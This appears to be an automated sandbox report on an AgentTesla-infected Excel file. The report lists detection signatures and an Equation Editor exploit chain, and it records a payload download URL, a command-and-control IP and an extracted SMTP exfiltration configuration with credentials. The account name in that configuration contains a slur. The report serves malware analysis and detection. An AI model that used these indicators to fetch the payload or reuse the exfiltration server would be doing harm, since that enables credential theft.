Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nova naredba_HR-WJO-12-10-2024.xlam.xlsx

Overview

General Information

Sample name:Nova naredba_HR-WJO-12-10-2024.xlam.xlsx
Analysis ID:1572388
MD5:80422f16531f8c43944e04bf3538efdf
SHA1:f137aa50426c79fa8645d6bfc2610a98cf2c4fa3
SHA256:971e2daca5513d707e83bc64690d35a29a7c27d02fa0f1dce8b6694e79b9a65c
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3400 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3608 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • ghxtg8op.exe (PID: 3752 cmdline: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe MD5: EF05B0557B2C8F0C951A1B21B812E75F)
        • RegSvcs.exe (PID: 3788 cmdline: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabown22jan2024@worlorderbillions.top", "Password": "3^?r?mtxk(kt               "}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x679c:$s1: <legacyDrawing r:id="
  • 0x67c4:$s2: <oleObject progId="
  • 0x680c:$s3: autoLoad="true"

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
          • 0x334fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
          • 0x3356d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
          • 0x335f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
          • 0x33689:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
          • 0x336f3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
          • 0x33765:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
          • 0x337fb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
          • 0x3388b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.ghxtg8op.exe.d00000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.ghxtg8op.exe.d00000.0.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.ghxtg8op.exe.d00000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
              • 0x334fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
              • 0x3356d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
              • 0x335f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
              • 0x33689:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
              • 0x336f3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
              • 0x33765:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
              • 0x337fb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
              • 0x3388b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
              6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 4 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 190.90.160.170, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3608, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3608, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3608, Protocol: tcp, SourceIp: 190.90.160.170, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3608, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ProcessId: 3752, ProcessName: ghxtg8op.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3608, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ProcessId: 3752, ProcessName: ghxtg8op.exe
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ParentProcessId: 3752, ParentProcessName: ghxtg8op.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ProcessId: 3788, ProcessName: RegSvcs.exe
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3608, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsxAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://aquafusion.com.co/ngbx/ngown.exeAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 6.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabown22jan2024@worlorderbillions.top", "Password": "3^?r?mtxk(kt "}
                  Multi AV Scanner detection for submitted file
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsxReversingLabs: Detection: 65%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 190.90.160.170 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: ghxtg8op.exe, 00000005.00000003.485569970.0000000002980000.00000004.00001000.00020000.00000000.sdmp, ghxtg8op.exe, 00000005.00000003.485229228.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00DA445A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAC6D1 FindFirstFileW,FindClose,5_2_00DAC6D1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00DAC75C
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00DAEF95
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00DAF0F2
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00DAF3F3
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00DA37EF
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00DA3B12
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00DABCBC

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Shellcode detected
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560540 WinExec,ExitProcess,2_2_03560540
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035604F5 URLDownloadToFileW,2_2_035604F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356047A LoadLibraryW,URLDownloadToFileW,2_2_0356047A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035603CF ExitProcess,2_2_035603CF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560560 ExitProcess,2_2_03560560
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035603E8 URLDownloadToFileW,2_2_035603E8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560494 URLDownloadToFileW,2_2_03560494
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560404 URLDownloadToFileW,2_2_03560404
                  Source: global trafficDNS query: name: aquafusion.com.co
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
